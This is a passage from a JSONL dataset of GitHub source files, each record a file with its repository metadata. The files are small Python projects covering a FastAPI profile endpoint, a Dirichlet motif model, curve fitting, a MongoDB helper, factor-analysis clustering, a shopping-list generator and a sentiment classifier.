dct_multi.append(dct_single(img1[i, :, :], scale_down, filter_size, view, title))\n compressed_image = np.array(dct_multi)\n else:\n compressed_image = dct_single(img1, scale_down, filter_size, view, title)\n\n return compressed_image\n","repo_name":"pdncovid/remote_sensing","sub_path":"fn/spectral_functions.py","file_name":"spectral_functions.py","file_ext":"py","file_size_in_byte":11752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"74767332754","text":"from fastapi import APIRouter\nfrom db import *\nfrom utils.tokens import *\nfrom dataclasses import dataclass\n\nrouter = APIRouter()\n\n\n@dataclass(slots=True)\nclass ProfileResult:\n username: str\n mail: str\n avatar: str\n\n\n@router.get('/user/profile',\n tags=['User Methods'],\n name='View User Profile',\n response_model=ProfileResult)\nasync def view_profile(user_id: int = Depends(authenticated_user)):\n with db_session:\n user = User[user_id]\n return ProfileResult(\n username=user.name,\n mail=user.email,\n avatar=\"http://localhost:9000/\" + user.avatar\n )\n","repo_name":"gran-soldador/pyrobots-backend","sub_path":"endpoints/user/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"29100710035","text":"import numpy\n\n__author__ = 'Romain Tavenard romain.tavenard[at]univ-rennes2.fr'\n\n\n# d denotes document index\n# i denotes an observation in a document\n# m denotes a motif\n# o denotes a motif occurrence in a document\n\nclass HierarchicalDirichletLatentSemanticMotifs:\n def __init__(self, motif_length, n_words, alpha, eta, gamma, n_iter=100):\n self.wo = [] # d, i -> o\n self.om = [] # d, o -> m\n self.ost = [] # d, o -> st\n\n self.motif_length = motif_length\n self.n_words = n_words\n\n self.alpha = alpha\n self.eta = eta\n self.gamma = gamma\n\n self.n_iter = n_iter\n\n self.docs_ = None\n\n self.n_occ_ = 0\n self.n_occ_m_ = []\n\n self.n_obs_m_ = []\n self.n_obs_wtm_ = []\n\n @property\n def n_docs(self):\n return len(self.wo)\n\n @property\n def n_motifs(self):\n return len(self.n_occ_m_)\n\n # Short names for n_words and motif_length\n @property\n def n_t(self):\n return self.motif_length\n\n @property\n def n_w(self):\n return self.n_words\n\n def p_wt_m(self, m):\n return (self.n_obs_wtm_[m] + self.eta) / (self.n_obs_m_[m] + self.n_w * self.n_t * self.eta)\n\n def fit(self, docs):\n \"\"\"Fitting the model to observations found in docs.\n\n docs is a list of numpy arrays. Each array has shape (n_obs[d], 2).\n docs[d][:, 0] contains words.\n docs[d][:, 1] contains timestamps.\n \"\"\"\n self.__init_from_data(docs)\n for _ in range(self.n_iter):\n self._fit_one_iter(docs)\n return self\n\n def _fit_one_iter(self, docs):\n for d in range(self.n_docs):\n n_obs_d = self.wo[d].shape[0]\n n_ts_d = numpy.max(docs[d][:, 1]) + 1\n for i in range(n_obs_d):\n w_di = docs[d][i, 0]\n t_di = docs[d][i, 1]\n old_wo_di = self.wo[d][i]\n n_occ_d = len(self.om[d]) # number of occurrences in the current doc\n\n self._cancel_obs(d, i)\n\n probas = numpy.zeros((n_occ_d + 1, ))\n # Existing occurrence case\n for o in range(n_occ_d):\n rt_di = t_di - self.ost[d][o]\n if 0 <= rt_di < self.n_t:\n m_di = self.om[d][o]\n # Using Eq. 10 from supp material (cf pdf)\n p_wt = (self.n_obs_wtm_[m_di][w_di, rt_di] + self.eta) / (self.n_obs_m_[m_di] +\n self.n_w * self.n_t * self.eta) # Assumes uniform prior\n # Using Eq. 11 from supp material (cf pdf)\n p_o = self._n_obs_do(d, o) / (n_obs_d - 1 + self.alpha)\n probas[o] = p_wt * p_o\n # New occurrence case\n probas_motif = numpy.zeros((self.n_motifs + 1, ))\n denom_gamma = self.n_occ_ + self.gamma # Denom in Eq 15\n p_o = self.alpha / (n_obs_d - 1 + self.alpha)\n for m in range(self.n_motifs):\n p_wt = (self.n_obs_wm_(w_di, m) + self.eta) / (self.n_obs_m_[m] + self.eta * self.n_w * self.n_t) # Eq 16\n p_k = self.n_occ_m_[m] / denom_gamma # Eq 15\n probas_motif[m] = p_k * p_wt / n_ts_d # Eq 14\n # New occurrence, new motif case\n probas_motif[-1] = self.gamma / (denom_gamma * self.n_words * n_ts_d) # p_o factor is given afterwards\n probas[-1] = p_o * numpy.sum(probas_motif)\n\n draw = numpy.random.multinomial(1, pvals=probas / numpy.sum(probas))\n new_wo_di = numpy.argmax(draw)\n if new_wo_di == n_occ_d: # New occurrence drawn\n self.ost[d].append(t_di - numpy.random.randint(self.motif_length))\n draw = numpy.random.multinomial(1, pvals=probas_motif / numpy.sum(probas_motif))\n m = numpy.argmax(draw)\n self.om[d].append(m)\n self.n_occ_ += 1\n if m < self.n_motifs:\n self.n_occ_m_[m] += 1\n else:\n self.n_occ_m_.append(1) # Creating a new motif with a single occurrence\n self._change_occurrence(d, i, old_wo_di, new_wo_di)\n\n def n_obs_wm_(self, w, m):\n return numpy.sum(self.n_obs_wtm_[m][w, :])\n\n def _n_obs_do(self, d, o):\n return numpy.sum(self.wo[d] == o)\n\n def _cancel_obs(self, d, i):\n o = self.wo[d][i]\n if o >= 0:\n m = self.om[d][o]\n self.n_obs_m_[m] -= 1\n rt = self.docs_[d][i, 1] - self.ost[d][o]\n w = self.docs_[d][i, 0]\n self.n_obs_wtm_[m][w, rt] -= 1\n self.wo[d][i] = -1\n\n def _change_occurrence(self, d, i, old_wo_di, new_wo_di):\n self.wo[d][i] = new_wo_di\n # Update n_obs (only update for new affectation as previous one was already removed in _cancel_obs)\n self._update_n_obs(d, i, new_wo_di)\n\n if old_wo_di == new_wo_di:\n return None\n if old_wo_di >= 0:\n old_m = self.om[d][old_wo_di]\n else:\n old_m = None\n\n # Occurrence remapping\n if old_wo_di >= 0 and not self._exists_occurrence(d, old_wo_di):\n self.n_occ_ -= 1\n self.n_occ_m_[old_m] -= 1\n del self.om[d][old_wo_di]\n del self.ost[d][old_wo_di]\n for _i in range(self.wo[d].shape[0]):\n if self.wo[d][_i] > old_wo_di:\n self.wo[d][_i] -= 1\n # Motif remapping\n if old_m is not None and not self._exists_motif(old_m):\n del self.n_occ_m_[old_m]\n del self.n_obs_m_[old_m]\n del self.n_obs_wtm_[old_m]\n for _d in range(len(self.docs_)):\n for _o in range(len(self.om[_d])):\n if self.om[_d][_o] > old_m:\n self.om[_d][_o] -= 1\n\n def _update_n_obs(self, d, i, o):\n m = self.om[d][o]\n rt = self.docs_[d][i, 1] - self.ost[d][o]\n w = self.docs_[d][i, 0]\n if m < len(self.n_obs_m_):\n self.n_obs_m_[m] += 1\n self.n_obs_wtm_[m][w, rt] += 1\n else:\n self.n_obs_m_.append(1)\n n_obs = numpy.zeros((self.n_words, self.motif_length), dtype=numpy.int)\n n_obs[w, rt] = 1\n self.n_obs_wtm_.append(n_obs)\n\n def _exists_occurrence(self, d, o):\n for _o in self.wo[d]:\n if _o == o:\n return True\n return False\n\n def _exists_motif(self, m):\n return self.n_occ_m_[m] > 0\n\n def __init_from_data(self, docs):\n self.wo = [numpy.zeros((doc_d.shape[0], ), dtype=numpy.int) - 1 for doc_d in docs]\n self.om = [[] for doc_d in docs]\n self.ost = [[] for doc_d in docs]\n self.docs_ = docs\n\n self.n_occ_ = 0\n self.n_occ_m_ = []\n\n self.n_obs_m_ = []\n self.n_obs_wtm_ = []\n","repo_name":"rtavenar/hdlsm","sub_path":"hdlsm_model.py","file_name":"hdlsm_model.py","file_ext":"py","file_size_in_byte":7060,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"84"} +{"seq_id":"1746756485","text":"#!/usr/bin/env python\nimport scipy as sp\nimport matplotlib.pyplot as plt\n\ndef error(f,x,y):\n return sp.sum((f(x)-y)**2)\n\n\n#loading data\n#____________________\ndata = sp.genfromtxt(\"/Users/avinashkulkarni/data.tsv\",delimiter = \"\\t\")\nx = data[:,0]\ny = data[:,1]\n\n\n#polynomial fitting\n#____________________\nfp1,residuals,rank,sv,rcond = sp.polyfit(x,y,1,full=True)\nf1 = sp.poly1d(fp1)\nprint(error(f1,x,y))\n#____________________\nf2p = sp.polyfit(x,y,2)\nf2 = sp.poly1d(f2p)\nprint(error(f2,x,y))\n#____________________\nf3p = sp.polyfit(x,y,3)\nf3 = sp.poly1d(f3p)\nprint(error(f3,x,y))\n\n#plotting\n#____________________\nplt.scatter(x,y)\nplt.title(\"Quadratic Plot\")\nplt.xlabel(\"time\")\nplt.ylabel(\"Hits\")\n#plt.xticks\nfx=sp.linspace(0,x[-1],30)\nplt.plot(fx,f1(fx),linewidth=1)\nplt.plot(fx,f2(fx),linewidth=1)\nplt.plot(fx,f3(fx),linewidth=1)\nplt.autoscale(tight=True)\nplt.grid()\nplt.show()\n\n\n#========================\n","repo_name":"ninadk1092/ML-Python","sub_path":"plot/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"13165322121","text":"from pymongo import MongoClient\n#pip install pymongo\n\nclass MongoConnect():\n\n def save(self, json):\n try:\n cliente = MongoClient('localhost', 27017)\n db = cliente.teste #nome do banco\n colecao = db.aluno #nome da coleção\n id = colecao.insert_one(json).inserted_id\n except Exception as e:\n print(\"problema ao salvar registro\")\n print(json)\n print(e)","repo_name":"teago83/MongoDB","sub_path":"conexao.py","file_name":"conexao.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"9070211542","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 24 21:02:28 2020\n\n@author: alex\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Konstanten\nL=10\ncells=100\nTw=20\nkappa = 1\nAo = 1\n\n# Domain Definition\n\ndelta_x=L/cells\nx=np.linspace(delta_x/2,L-delta_x/2,cells)\n\n# Koeffizientenmatrix\nA=np.zeros([cells,cells])\n\n# Q-Vektor\n\nQ=np.zeros([cells,1])\n\nw=np.zeros([cells,1])\nw[int(cells/3):int(2*cells/3)]=1\n\n\n\n# innere Stützstellen\nfor i in range(1,cells-1):\n A[i,i-1]= 1 * (kappa * Ao / delta_x)\n A[i,i] = -2* (kappa * Ao / delta_x)\n A[i,i+1]= 1 * (kappa * Ao / delta_x)\n \n # Q Vektor\n Q[i]=-w[i]*delta_x * Ao\n \n# Randwerte\n# linker Rand\nA[0,0] = -3 * (kappa * Ao / delta_x)\nA[0,1] = 1 * (kappa * Ao / delta_x)\nQ[0] = -delta_x *Ao * w[0] - 2*kappa*Ao*Tw/delta_x\n\n# Rechter Rand \nA[-1,-1] = -1 * (kappa * Ao / delta_x)\nA[-1,-2] = 1 * (kappa * Ao / delta_x)\nQ[-1] = -delta_x *Ao * w[-1]\n\n\n# Lösung\n\nT=np.linalg.solve(A, Q)\n\n# plotten\nplt.plot(x,T,'r-o')\nplt.plot(x,w,'b--')\n\n# oder plotten inklsive Randwerte\n#plt.plot(np.append(np.append(0,x),L),np.append(np.append(Tw,T),T[-1]),'b-o')\n\n","repo_name":"karan-kc/CFD","sub_path":"Rechnerubung/Week3/Aufgabe/1d_Diffusion_FVM.py","file_name":"1d_Diffusion_FVM.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"84"} +{"seq_id":"13280672174","text":"from .base import PipBaseRecipe\n\n\nclass DocutilsRecipe(PipBaseRecipe):\n def __init__(self, *args, **kwargs):\n super(DocutilsRecipe, self).__init__(*args, **kwargs)\n self.sha256 = '51e64ef2ebfb29cae1faa133b3710143' \\\n '496eca21c530f3f71424d77687764274'\n\n self.name = 'docutils'\n self.depends = []\n self.version = '0.14'\n","repo_name":"stangelandcl/hardhat","sub_path":"hardhat/recipes/python/docutils.py","file_name":"docutils.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"30700114095","text":"# -*- encoding=utf-8 -*-\nimport os, sys\n\ndef writefile(nameindex):\n try:\n rfile = open(\"C:/Users/Administrator/Desktop/abc.txt\", \"r\")\n wfile = open(\"C:/Users/Administrator/Desktop/abc2.txt\", \"w\")\n except IOError:\n print (\"The file don't exist, Please double check!\")\n exit()\n n = 0;\n AllLines = rfile.readlines()\n for EachLine in AllLines:\n if (n != nameindex):\n wfile.write(''+'\\n')\n # print(n)\n else:\n wfile.write(EachLine)\n n=n+1\n rfile.close()\n wfile.close()\n\n S1 = wfile.closed\n if True == S1:\n print( 'the file is closed')\n else:\n print ('The file donot close')\n\nif __name__ == \"__main__\":\n i=1\n writefile(i)","repo_name":"snail0614/tools","sub_path":"Python/read_write_file.py","file_name":"read_write_file.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"15027902330","text":"import pandas\nimport numpy\nimport numpy as np \nfrom factor_analyzer import FactorAnalyzer\nfrom sklearn.cluster import KMeans\nfrom sklearn.mixture import GaussianMixture\nimport matplotlib.pyplot as pyplot\nfrom sklearn.metrics import silhouette_score\nimport scipy.cluster.hierarchy as shc\nfrom sklearn.cluster import AgglomerativeClustering\n\ndf = pandas.read_csv(\"dataset_final.csv\") # Load Data Set\n\n# US Subset\ndf_us = df.loc[df['country'] == \"US\"]\ndf_us.drop(['country'], axis=1,inplace=True)\ndf_us.drop(['Unnamed: 0'], axis=1,inplace=True)\ndf_us.replace(0,np.nan, inplace=True) #how do we drop or do we need to drop values = to zero\ndf_us.dropna(inplace=True)\n\n#print(df_us)\n\n# Hong Kong Subset\ndf_hk = df.loc[df['country'] == \"HK\"]\ndf_hk.drop(['country'], axis=1,inplace=True)\ndf_hk.drop(['Unnamed: 0'], axis=1,inplace=True)\ndf_hk.replace(0,np.nan, inplace=True) #how do we drop or do we need to drop values = to zero\ndf_hk.dropna(inplace=True)\n#print(df_hk)\n\n# Eigen Values - US\nmachine = FactorAnalyzer(n_factors=40, rotation=None)\nmachine.fit(df_us)\nev_US,v = machine.get_eigenvalues()\n#print(ev_US)\n\npyplot.scatter(range(1,df_us.shape[1]+1),ev_US)\npyplot.savefig(\"evplot_US.png\")\n\n\n# Eigen Values - HK\nmachine = FactorAnalyzer(n_factors=40, rotation=None)\nmachine.fit(df_hk)\nev_HK,v = machine.get_eigenvalues()\n#print(ev_HK)\n\npyplot.scatter(range(1,df_hk.shape[1]+1),ev_HK)\npyplot.savefig(\"evplot_HK.png\")\n\n\n\n# Using 6 Factors - US - 6 Factors chose based on eigen value elbow analysis\nmachine = FactorAnalyzer(n_factors=6, rotation='varimax')\nmachine.fit(df_us)\n\nloadings = machine.loadings_\nnumpy.set_printoptions(suppress=True)\n#print(loadings)\n#print(machine.get_factor_variance())\n\n\ndf_us = df_us.values \nresult = numpy.dot(df_us,loadings)\n#print(result)\n#print(result.shape)\n\n## For HK it is harder to choose the appropote number of factors, we do not have a diminsihing marginal returns. \n\nmachine = FactorAnalyzer(n_factors=10, rotation='varimax')\nmachine.fit(df_hk)\n\nloadings = machine.loadings_\nnumpy.set_printoptions(suppress=True)\n#print(loadings)\n#print(machine.get_factor_variance())\n\n\ndf_hk = df_hk.values \nresult = numpy.dot(df_hk,loadings)\n#print(result)\n#print(result.shape)\n\n## Compare the Analysis with AHC Clustering \n\n#AHC - US\nprint(\"US AHC silhouette score\")\npyplot.title(\"Dendrogram_US\")\ndendrogram_object = shc.dendrogram(shc.linkage(df_us, method = \"ward\")) \npyplot.savefig(\"dendrogram_US.png\")\npyplot.close()\n#Optimum # is 4 from the Dendrogram\nmachine = AgglomerativeClustering(n_clusters = 4, affinity=\"euclidean\", linkage=\"ward\")\nresults_ahc_us = machine.fit_predict(df_us)\n\nsilhouette = (silhouette_score(df_us, results_ahc_us, metric = 'euclidean'))\nprint(silhouette)\n\n\n# AHC - HK\nprint(\"HK AHC silhouette score\")\npyplot.title(\"Dendrogram_HK\")\ndendrogram_object = shc.dendrogram(shc.linkage(df_hk, method = \"ward\")) \npyplot.savefig(\"dendrogram_HK.png\")\npyplot.close()\n#Optimum # is 4 from the Dendrogram\nmachine = AgglomerativeClustering(n_clusters = 4, affinity=\"euclidean\", linkage=\"ward\")\nresults_ahc_hk = machine.fit_predict(df_hk)\n\nsilhouette = (silhouette_score(df_hk, results_ahc_hk, metric = 'euclidean'))\nprint(silhouette)\n\n\n\n\n\n\n\n","repo_name":"ghfinley/ECON860_Final","sub_path":"compare_countries.py","file_name":"compare_countries.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"35829928040","text":"from ShoppingItem import ShoppingItem\r\nimport datetime\r\n\r\n'''\r\nDaniel Anderson\r\nCS521 Due 5/2/2018\r\nProject\r\nShoppingListGenerator.py\r\n'''\r\n\r\ndef getShoppingPriceList():\r\n \"\"\" Import the price list file as a list of dictionaries \"\"\"\r\n infile = open(\"shopping_price_list.txt\", \"r\", encoding='utf-8-sig')\r\n list = infile.readlines()\r\n price_list = []\r\n infile.close()\r\n for x in list:\r\n lst = x.replace('\\n', '').split('; ')\r\n price_dict = {\"Name\": lst[0], \"Price\": float(lst[1]), \"Taxable\": lst[2]}\r\n price_list.append(price_dict)\r\n return price_list\r\n\r\n\r\ndef findItems(prices, str):\r\n \"\"\"\r\n Search the items on the price list and return a smaller list of possible choices\r\n\r\n :param prices: price list of all availble items, list of dictionaries\r\n :param str: string that is being searched\r\n :return: list of possible choices from the price list that match the user's search\r\n \"\"\"\r\n smallerList = []\r\n for i in prices:\r\n if( i[\"Name\"].lower().find(str.lower()) != -1):\r\n smallerList.append(i)\r\n return smallerList\r\n\r\n\r\ndef displayList(myList):\r\n \"\"\"\r\n Returns a string of the list and displays the list to the console.\r\n\r\n :param myList: list of ShoppingItems chosen by the user\r\n :return: string of the user's shopping list\r\n \"\"\"\r\n tax = 0 # To track the total amount of tax\r\n subtotal = 0 # To track the total price of all the items\r\n list_text = \"\" # String list that will be printed to the console and returned\r\n list_text += \"\\nYour Shopping List - \\n\"\r\n list_text += (\"{0:75s} {1:>20s} {2:>18s} {3:>20s}\".format(\"\\tName of the Item:\", \"Unit Price($):\", \"Quantity:\", \"Total Price($):\") + \"\\n\")\r\n for item in myList:\r\n list_text += (\"\\t\" + str(item) + \"\\n\")\r\n subtotal += item.getTotalPrice()\r\n if( item.IsTaxable()):\r\n tax = tax + (item.getPrice() * item.getTaxRate())\r\n total = subtotal + tax\r\n list_text += (\"\\n{0:>125s} {1:>8.2f}\\n\".format(\"Your subtotal is:\", subtotal))\r\n list_text += (\"{0:>125s} {1:>8.2f}\\n\".format(\"Tax:\", tax))\r\n list_text += (\"{0:>125s} {1:>8.2f}\\n\".format(\"Your total amount:\", total))\r\n print(list_text)\r\n return list_text\r\n\r\ndef saveList(list_text):\r\n \"\"\"\r\n Write the list to a text file with a datestamp using the string representation\r\n cite - https://www.saltycrane.com/blog/2008/06/how-to-get-current-date-and-time-in/\r\n\r\n :param list_text:\r\n :return:\r\n \"\"\"\r\n today = datetime.datetime.now().strftime(\"%m%d%Y\") # Get the date for the date stamp\r\n filename = \"shopping_list_\" + today + \".txt\"\r\n outfile = open(filename, \"w\")\r\n outfile.write(list_text)\r\n outfile.close()\r\n\r\ndef main():\r\n \"\"\"\r\n The main function runs the ShoppingListGenerator. This method loads the pricing list into the program as a list\r\n of dictionaries. It then prompts the user to enter a search term for items the user wants. It produces a list of\r\n possible items that match the user's search parameters and prompts the user to keep returning if the list has more\r\n than one item. It prompts the user to search again or exit and prompts the user to save the file.\r\n \"\"\"\r\n price_list = getShoppingPriceList() # Get the pricing list\r\n myList = [] # Create the user's list\r\n isShopping = True # Set isShopping to true to run the loop\r\n\r\n\r\n # Several items are pre-loaded into the list for testing\r\n \"\"\"\r\n item1 = ShoppingItem(\"Apples\", 2.99, \"N\", 2)\r\n item2 = ShoppingItem(\"Bacon\", 2.99, \"N\", 3)\r\n item3 = ShoppingItem(\"Beef Stew Meat\", 4.19, \"N\", 4)\r\n item4 = ShoppingItem(\"Butter\", 2.29, \"N\", 5)\r\n item5 = ShoppingItem(\"Carrots\", 1.29, \"N\", 4)\r\n item7 = ShoppingItem(\"Coffee\", 4.99, \"N\", 2)\r\n item8 = ShoppingItem(\"Eggs\", 1.09, \"N\", 1)\r\n item9 = ShoppingItem(\"French Fries\", 1.89, \"N\", 1)\r\n item10 = ShoppingItem(\"Ground Beef (sirloin, 90/10)\", 3.49, \"N\", 1)\r\n item11 = ShoppingItem(\"Ham\", 2.99, \"N\", 2)\r\n item12 = ShoppingItem(\"Hand soap\", 0.89, \"Y\", 4)\r\n item13 = ShoppingItem(\"Ketchup\", 1.49, \"N\", 2)\r\n item14 = ShoppingItem(\"Measuring spoons\", 1.19, \"Y\", 1)\r\n item15 = ShoppingItem(\"Milk\", 1.99, \"N\", 2)\r\n item16 = ShoppingItem(\"Oat Meal\", 1.49, \"N\", 2)\r\n item18 = ShoppingItem(\"Spatula\", 1.79, \"Y\", 3)\r\n item20 = ShoppingItem(\"Wipes\", 2.89, \"Y\", 2)\r\n \r\n myList.append(item2)\r\n myList.append(item3)\r\n myList.append(item4)\r\n myList.append(item5)\r\n myList.append(item7)\r\n myList.append(item8)\r\n myList.append(item9)\r\n myList.append(item10)\r\n myList.append(item11)\r\n myList.append(item12)\r\n myList.append(item13)\r\n myList.append(item14)\r\n myList.append(item15)\r\n myList.append(item16)\r\n myList.append(item18)\r\n myList.append(item20)\r\n \"\"\"\r\n\r\n while( isShopping ):\r\n usingList = True # Set to true if the user will be using the list\r\n\r\n # Prompt user to enter an item for the shopping list\r\n item = input(\"\\nPlease enter an item to search the list. Enter 'exit' to exit: \")\r\n\r\n # If the user types exit, prompts the user to save and exits the program\r\n if( item == 'exit'):\r\n isShopping = False;\r\n if( len(myList) == 0):\r\n print(\"\\n No items were chosen. Shopping list was not created.\")\r\n else:\r\n list_text = displayList(myList)\r\n savedList = input(\"To save the list, enter 'Y' or 'y': \")\r\n if( savedList.upper() == 'Y'):\r\n saveList(list_text)\r\n break\r\n\r\n # Gets the list of possible item matches for the user\r\n while( usingList):\r\n items = findItems(price_list, item)\r\n\r\n # If no items were found, prints message to the console and exits the inner loop\r\n if( len(items) == 0):\r\n print(\"\\nSorry, the item entered wasn't found.\")\r\n usingList = False\r\n\r\n # Prints the list of matches to the screen\r\n else:\r\n print(\"\\nThe following items were found: \\n\")\r\n for i in range(len(items)):\r\n print(\"\\t{}. {} - {}\".format(i+1, items[i][\"Name\"], items[i][\"Price\"]))\r\n\r\n # Ask the user to choose from the list, validate user input\r\n str_index = input(\"\\nPlease select an item from the list or enter '0' to search again. \")\r\n isValid = False\r\n while( not isValid): # index > len(items)\r\n if( not str_index.isdigit()):\r\n str_index = input(\"Entry is not an integer. Please select an item from the list or enter '0' to search again. \")\r\n elif( int(str_index) not in range(0, len(items) + 1)):\r\n str_index = input(\"Entry is not in the list. Please select an item from the list or enter '0' to search again. \")\r\n else:\r\n index = int(str_index)\r\n isValid = True\r\n\r\n if( index != 0):\r\n\r\n # Ask the user for a quantity\r\n qty = eval(input(\"Please enter the quantity of the item you would like to purchase. \"))\r\n\r\n # Create the shopping item and add to the list\r\n shopping_item = ShoppingItem(items[index - 1][\"Name\"], items[index - 1][\"Price\"],\r\n items[index - 1][\"Taxable\"], qty)\r\n myList.append(shopping_item)\r\n print(\"\\n{1} was added to your list, quantity of {0}.\\n\".format(shopping_item.getQuantity(), shopping_item.getName()))\r\n\r\n # Prompts the user to return to the search list if the search list has more than one item\r\n if( len(items) <= 1):\r\n usingList = False\r\n else:\r\n key = input(\"Press any key to return to the search list or enter '0' to search again. \")\r\n if(key == '0'):\r\n usingList = False\r\n\r\n # Exit the inner loop\r\n else:\r\n usingList = False\r\n\r\n\r\n# Run main method\r\nmain()\r\n","repo_name":"dan31877/Programming-Projects","sub_path":"ShoppingList-Python/ShoppingListGenerator.py","file_name":"ShoppingListGenerator.py","file_ext":"py","file_size_in_byte":8281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"4376521842","text":"#----constantes----#\nPREGUNTA_NOMBRE = \"digite nombre : \"\npreguntaedad = \"digite edad\"\nmensajesaludo = \"un gusto conocerte\"\npreguntaestatura = \"digite estatura\"\nestatura = float(input (preguntaestatura))\nnombre = input (PREGUNTA_NOMBRE)\nedad = int (input (preguntaedad))\nprint (mensajesaludo, nombre)\nprint (edad+8)","repo_name":"tomi8a/programandodelaaalaz","sub_path":"clases/inputsclase.py","file_name":"inputsclase.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"17655300809","text":"import csv\nimport re\nimport numpy as np\nimport warnings\nfrom sklearn.preprocessing import MultiLabelBinarizer\nfrom sklearn.pipeline import FeatureUnion, Pipeline\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import f1_score, precision_score, recall_score\nfrom sklearn.model_selection import KFold\nfrom sklearn.externals import joblib\n\nclass SentimentExtractor(object):\n\n ASPECTS = ['cleanliness', 'food/drinks', 'location', 'room amenities', 'staff']\n TARGET_NAMES = ['negative', 'positive']\n\n def __init__(self):\n self.clf = []\n for i in range(len(self.ASPECTS)):\n pipeline = Pipeline([\n ('features', FeatureUnion(\n transformer_list = [\n ('bag_of_ngram', CountVectorizer(ngram_range=(1, 5)))\n ]\n )),\n ('clf', LogisticRegression())\n ])\n self.clf.append(pipeline)\n\n @classmethod\n def read_data(cls, filename):\n \"\"\"\n Load dataset from csv.\n\n Parameters\n ----------\n filename: Filename of the dataset in csv.\n\n Returns\n -------\n data: Review sentences grouped by aspects.\n targets: data labels grouped by aspects.\n \"\"\"\n data = [[] for i in range(len(cls.ASPECTS))]\n targets = [[] for i in range(len(cls.ASPECTS))]\n regex = re.compile('[^0-9a-zA-Z]+')\n\n with open(filename, encoding='utf-8') as f:\n reader = csv.reader(f, delimiter=';', quotechar='\"')\n next(reader)\n for row in reader:\n text = regex.sub(' ', row[0])\n for i in range(1, len(cls.ASPECTS) + 1):\n if row[i] != '-':\n data[i - 1].append(text)\n targets[i - 1].append(cls.TARGET_NAMES.index(row[i]))\n\n return data, targets\n\n def fit(self, X, y):\n \"\"\"\n Train model.\n\n Parameters\n ----------\n X: Train data grouped by aspects.\n y: Train data labels grouped by aspects.\n\n Returns\n -------\n self\n \"\"\"\n for i in range(len(self.ASPECTS)):\n self.clf[i].fit(X[i], y[i])\n return self\n\n def predict(self, X):\n \"\"\"\n Predict the given data.\n\n Parameters\n ----------\n X: Data to predict (contain dict with sentence and aspects as key).\n\n Returns\n -------\n results: data and labels for the given data.\n \"\"\"\n results = []\n for i in range(len(X)):\n result = {}\n result['sentence'] = X[i]['sentence']\n result['aspects'] = []\n for aspect in X[i]['aspects']:\n aspect_result = {}\n aspect_result['aspect'] = aspect\n index = self.ASPECTS.index(aspect)\n label = self.clf[index].predict([X[i]['sentence']])\n aspect_result['polarity'] = self.TARGET_NAMES[label[0]]\n result['aspects'].append(aspect_result)\n results.append(result)\n return results\n\n def cross_validate(self, X, y, k):\n \"\"\"\n KFold cross validation.\n\n Parameters\n ----------\n X: Train data grouped by aspects.\n y: Train data labels grouped by aspects.\n k: Number of folds.\n \"\"\"\n kf = KFold(n_splits=k)\n warnings.filterwarnings('ignore')\n print(\"Cross validation results:\")\n for i in range(len(self.ASPECTS)):\n print(\"\\tCategory:\", self.ASPECTS[i])\n precision_scores = []\n recall_scores = []\n f1_scores = []\n for train_index, test_index in kf.split(X[i]):\n X[i] = np.array(X[i])\n y[i] = np.array(y[i])\n X_train, X_test = X[i][train_index], X[i][test_index]\n y_train, y_test = y[i][train_index], y[i][test_index]\n\n self.clf[i].fit(X_train, y_train)\n y_pred = self.clf[i].predict(X_test)\n\n precision_scores.append(precision_score(y_test, y_pred, average='macro'))\n recall_scores.append(recall_score(y_test, y_pred, average='macro'))\n f1_scores.append(f1_score(y_test, y_pred, average='macro'))\n\n print(\"\\t\\tPrecision:\", np.array(precision_scores).mean())\n print(\"\\t\\tRecall:\", np.array(recall_scores).mean())\n print(\"\\t\\tF1-score:\", np.array(f1_scores).mean())\n\n def evaluate(self, test_data_filename):\n \"\"\"\n Evaluate the trained model using test data.\n\n Parameters\n ----------\n test_data_filename: Filename for the test data.\n \"\"\"\n X, y = SentimentExtractor.read_data(test_data_filename)\n\n print(\"Evaluation results:\")\n for i in range(len(self.ASPECTS)):\n print(\"\\tCategory:\", self.ASPECTS[i])\n y_pred = self.clf[i].predict(X[i])\n\n print(\"\\t\\tPrecision:\", precision_score(y[i], y_pred, average='macro'))\n print(\"\\t\\tRecall:\", recall_score(y[i], y_pred, average='macro'))\n print(\"\\t\\tF1-score:\", f1_score(y[i], y_pred, average='macro'))\n\n print(\"\\t\\tWrong classification:\")\n count = 0\n for j in range(len(X[i])):\n if y_pred[j] != y[i][j]:\n count += 1\n print(\"\\t\\t\\tSentence:\" , X[i][j])\n print(\"\\t\\t\\tActual:\", y[i][j])\n print(\"\\t\\t\\tPrediction:\", y_pred[j])\n print(\"\\t\\tNumber of wrong classification:\", count, \"out of\", len(X[i]))\n\n def save_model(self, model_filename):\n \"\"\"\n Save trained model.\n\n Parameters\n ----------\n model_filename: Filename for the trained model.\n\n Returns\n -------\n self\n \"\"\"\n for i in range(len(self.ASPECTS)):\n joblib.dump(self.clf[i], model_filename + str(i))\n return self\n\n def load_model(self, model_filename):\n \"\"\"\n Load trained model.\n\n 